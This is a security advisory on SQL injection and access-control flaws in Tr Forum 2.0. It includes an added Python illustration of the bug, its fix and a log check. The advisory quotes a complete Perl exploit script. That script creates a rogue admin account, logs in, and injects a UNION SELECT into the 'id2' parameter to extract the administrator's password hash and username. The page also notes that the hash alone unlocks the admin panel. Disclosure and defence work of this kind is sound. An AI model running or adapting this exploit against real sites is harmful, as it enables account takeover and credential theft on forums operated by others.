Category:   Application (Forum/Board/Portal)  >   Tr Forum
Vendors:   Guillaume
Tr Forum Input Validation Flaw in '/admin/editer.php' Lets Remote Users Inject SQL Commands
SecurityTracker Alert ID:  1016788
SecurityTracker URL:
CVE Reference:   CVE-2006-4584, CVE-2006-4585, CVE-2006-4586
Updated:  Jun 8 2008
Original Entry Date:  Sep 5 2006
Impact:   Disclosure of system information, Disclosure of user information, User access via network
Exploit Included:  Yes  
Version(s): 2.0
Description:   A vulnerability was reported in Tr Forum. A remote user can inject SQL commands.

The '/admin/editer.php' script does not properly validate user-supplied input in the 'id2' parameter. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database.

This can be exploited to obtain password hashes. Then, the remote user can supply a password hash for an administrator's account to the administrative panel to gain administrative access.
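An added illustration (not code from the advisory or from Tr Forum) of the bug described above: the unquoted-integer query behind the 'id2' injection, the validated and parameterised version that blocks it, and a request check that flags the pattern in access logs. It runs on an in-memory sqlite3 database; the posts table, its columns and the sample hash are assumptions, while tr_user_forum, pass and pseudo are the names used in this page's PoC.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Constructed in-memory stand-in for the forum database. tr_user_forum and
# its pass/pseudo columns are named in the PoC on this page; the posts
# table, its columns and the sample 32-hex hash are assumptions.
CONN = sqlite3.connect(":memory:")
CONN.executescript("""
CREATE TABLE tr_user_forum (id INTEGER, pseudo TEXT, pass TEXT);
INSERT INTO tr_user_forum VALUES (1, 'root', '5f4dcc3b5aa765d61d8327deb882cf99');
CREATE TABLE posts (id INTEGER, titre TEXT, auteur TEXT, lu INTEGER);
INSERT INTO posts VALUES (7, 'Welcome', 'root', 0);
""")

INJECTION = "-1 UNION SELECT pass,pseudo,0 FROM tr_user_forum"  # value from the PoC

def fetch_post_vulnerable(id2):
    # id2 is pasted into the SQL text unquoted, so no quote character is
    # needed to break out: the advisory's "SQL Injection without quote".
    sql = "SELECT titre, auteur, lu FROM posts WHERE id = " + id2
    return CONN.execute(sql).fetchall()

def is_valid_id(value):
    # An id is an optionally signed run of digits and nothing else.
    return re.fullmatch(r"-?\d+", value) is not None

def fetch_post_fixed(id2):
    # Validate, then bind as a parameter: the SQL text never carries
    # user-controlled characters, so the UNION above has nowhere to go.
    if not is_valid_id(id2):
        raise ValueError("id2 must be an integer")
    query = "SELECT titre, auteur, lu FROM posts WHERE id = ?"
    return CONN.execute(query, (int(id2),)).fetchall()

def flag_request(url):
    # Log or WAF check: an editer.php request whose id2 is not a plain
    # integer has the shape of the injection described in this advisory.
    parts = urlsplit(url)
    if not parts.path.endswith("admin/editer.php"):
        return False
    return any(not is_valid_id(v) for v in parse_qs(parts.query).get("id2", []))

if __name__ == "__main__":
    print(fetch_post_vulnerable("7"))        # the intended row
    print(fetch_post_vulnerable(INJECTION))  # leaks the admin's hash and name
    print(fetch_post_fixed("7"))
    print(flag_request("http://forum.example/admin/editer.php?id2=" + INJECTION))
```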

A remote user can access '/membres/modif_profil.php' to modify the profiles of arbitrary users.

A remote user can access '/membres/change_mdp.php' to modify the passwords of arbitrary users.

DarkFig discovered this vulnerability.

A demonstration exploit URL is available at:

Impact:   A remote user can execute SQL commands on the underlying database.

A remote user can modify certain user data on the target system.

Solution:   No solution was available at the time of this entry.
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.

Source Message Contents

Subject:  Tr Forum V2.0 Multiple Vulnerabilities

# Affected.scr..: Tr Forum V2.0
# Poc.ID........: 10060903
# Type..........: SQL Injection, Bypass Security Restriction
# Risk.level....: Medium
# Vendor.Status.: Unpatched
# Credits.......: DarkFig
# /membres/modif_profil.php => Profile modification (you can choose the id of the member)
# /membres/change_mdp.php   => Password modification ( same... )
# /admin/insert_admin.php   => Second admin (only del post)
# /admin/editer.php         => SQL Injection without quote
# You don't need to crack passwd hashes (for the admin panel)...
# Go to the admin panel (/admin/), enter the username and the hash (not the passwd)... bad security =(
# This exploit is FOR EDUCATIONAL PURPOSE ONLY x 999
use strict;
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common "POST";
use HTTP::Response;
use Getopt::Long;

# Option variables must be declared up front under 'use strict'.
my ($host, $path, $proxh, $proxu, $proxp);

print STDOUT "\n+", '-' x 53, "+\n";
print STDOUT "|    Tr Forum V2.0 Admin MD5 Passwd Hash Disclosure   |\n";
print STDOUT '+', '-' x 53, "+\n";

my $opt = GetOptions(
   'host=s'   =>  \$host,
   'path=s'   =>  \$path,
   'proxh=s'  =>  \$proxh,
   'proxu=s'  =>  \$proxu,
   'proxp=s'  =>  \$proxp);

if(!$host) {
    print STDOUT "| Usage: ./ --host=[www] --path=[/] [Options]    |\n";
    print STDOUT "| [Options] --proxh=[ip] --proxu=[user] --proxp=[pwd] |\n";
    print STDOUT '+', '-' x 53, "+\n";
    exit;
}

if($host  !~ /http/) {$host = 'http://'.$host;}
if($proxh && $proxh !~ /http/) {$proxh = 'http://'.$proxh.'/';}
if(!$path) {$path = '/';}

print STDOUT " [!]Host..: $host\n";
print STDOUT " [!]Path..: $path\n";
print STDOUT " [~]Admin user...\n";

# One user agent with a cookie jar, so the session from the login below
# is reused by the later request to admin/editer.php.
my $cc = HTTP::Cookies->new();
my $ua = LWP::UserAgent->new();
   $ua->cookie_jar($cc);
   $ua->proxy(['http'] => $proxh) if $proxh;

# Step 1: add a second (low-rights) admin account through insert_admin.php
my $re = POST $host.$path.'admin/insert_admin.php',[
         'login'    => 'AcidSploitWasHere',
         'password' => 'psychopasswd',
         'mail'     => ''];
   $re->proxy_authorization_basic($proxu, $proxp) if $proxp;
   $ua->request($re);

print STDOUT " [+]User..: AcidSploitWasHere\n";
print STDOUT " [+]Pass..: psychopasswd\n";
print STDOUT " [!]Rights: 2 (medium)\n";
print STDOUT " [~]Collecting admin's hash/username...\n";

# Step 2: log in as that account
$re = POST $host.$path.'index.php',[
         'login'   => 'AcidSploitWasHere',
         'pwd'     => 'psychopasswd'];
   $re->proxy_authorization_basic($proxu, $proxp) if $proxp;
   $ua->request($re);

# Step 3: the unquoted 'id2' parameter of admin/editer.php; the UNION
# pulls the admin's hash and username into the edit form.
my $res = $ua->get($host.$path.'admin/editer.php?id2=-1 UNION SELECT pass,pseudo,0 FROM tr_user_forum');

if($res->content =~ /">([a-z0-9]{32})<\/font>/) {
                print STDOUT "\n ".$1.'::';}

if($res->content =~ /;">(.*?)<\/textarea>/) {
                print STDOUT $1.' (root)';}

print STDOUT "\n+", '-' x 53, "+\n";

